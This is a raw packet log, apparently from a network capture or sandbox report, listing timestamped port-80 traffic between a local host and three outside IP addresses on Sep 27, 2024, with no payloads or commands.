                                                                          Sep 27, 2024 04:21:17.087332964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087464094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087472916 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087496042 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087518930 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087558031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087568998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087584019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087590933 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087605000 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087606907 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087616920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087625980 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087629080 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087644100 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087661028 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087701082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087712049 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087721109 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087732077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087732077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087743998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087755919 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087775946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087781906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087802887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.087811947 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.087836981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088486910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088499069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088505030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088532925 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088581085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088593006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088603020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088613987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088614941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088640928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088651896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088663101 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088664055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088674068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088686943 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088690996 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088702917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088726997 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088731050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088742018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088752031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.088768005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088778973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.088790894 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.096249104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096261024 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096271038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096287012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096297979 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096302032 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.096309900 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096324921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096328974 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.096365929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.096380949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.096417904 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.114021063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114032030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114041090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114047050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114052057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114061117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114067078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114068985 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114073038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114097118 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114129066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114135981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114161015 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114218950 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114228010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114238024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114247084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114258051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114286900 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114290953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114303112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114309072 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114315033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114325047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114326000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114345074 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114367962 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114389896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114401102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114411116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114422083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114423990 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114444017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114469051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114532948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114551067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114562035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114567995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114574909 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114582062 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114592075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114598036 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114604950 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114614010 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114617109 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114630938 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114650011 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114675045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114686966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114696026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.114706993 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.114732981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.121422052 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121450901 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121459961 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121510983 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.121510983 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.121594906 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121630907 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.121635914 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121646881 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121686935 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.121686935 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.121844053 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121885061 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.121912956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121922016 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121954918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.121983051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.121993065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122003078 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122010946 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122029066 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.122041941 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.122060061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122071981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122091055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122098923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122100115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.122109890 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122163057 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.122184038 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.122227907 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122239113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122247934 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122255087 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.122257948 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122267962 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122277975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122296095 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.122311115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.122359037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122370958 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122380018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122381926 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.122385025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122399092 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.122431040 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.122906923 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122935057 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122944117 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122955084 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.122967958 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.122982025 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122992992 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.122994900 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.123028994 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.123028994 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.123404026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123414040 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123423100 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123433113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123441935 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123442888 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123455048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123461962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123466969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123477936 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123493910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123495102 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123502970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123512030 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123528004 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123542070 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123553038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123554945 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123564959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123575926 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123591900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123609066 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123620033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123631001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123653889 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123668909 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.123872042 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123898983 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123908997 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123928070 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.123928070 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.123944044 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123958111 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.123984098 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.123984098 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.124190092 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.124325037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124335051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124345064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124361992 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.124382019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.124387026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124397993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124408007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124418974 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124423027 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.124445915 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.124454975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124471903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.124495983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.124891043 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124901056 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124912024 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124917030 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.124932051 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.125086069 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.125523090 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125560999 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125566959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125577927 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125603914 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125646114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125648975 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125658035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125669956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125677109 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125691891 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125705957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125766993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125777006 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125787020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125802994 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125823975 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125869989 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125880003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125889063 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125899076 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125905037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125912905 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125925064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125931978 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125948906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.125961065 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125983000 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.125989914 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126024961 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126048088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126058102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126066923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126076937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126086950 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126116037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126123905 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126140118 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126151085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126159906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126162052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126173019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126192093 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126214027 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126221895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126234055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126245022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126266956 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126286983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126317978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126327991 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126338005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126347065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126355886 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126386881 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126427889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126437902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126447916 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126461029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126467943 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126472950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126497984 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126523018 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126523018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126537085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.126559973 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.126580000 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.129708052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129746914 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.129750967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129761934 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129786968 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.129805088 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.129856110 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129867077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129883051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129892111 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129903078 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129904985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.129941940 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.129962921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129975080 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129983902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129995108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.129997969 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.130027056 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.130064011 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.130074978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.130089045 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.130096912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.130105019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.130132914 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.135040045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.135059118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.135067940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.135086060 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.135104895 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.135154963 CEST8049725185.215.113.117192.168.2.5
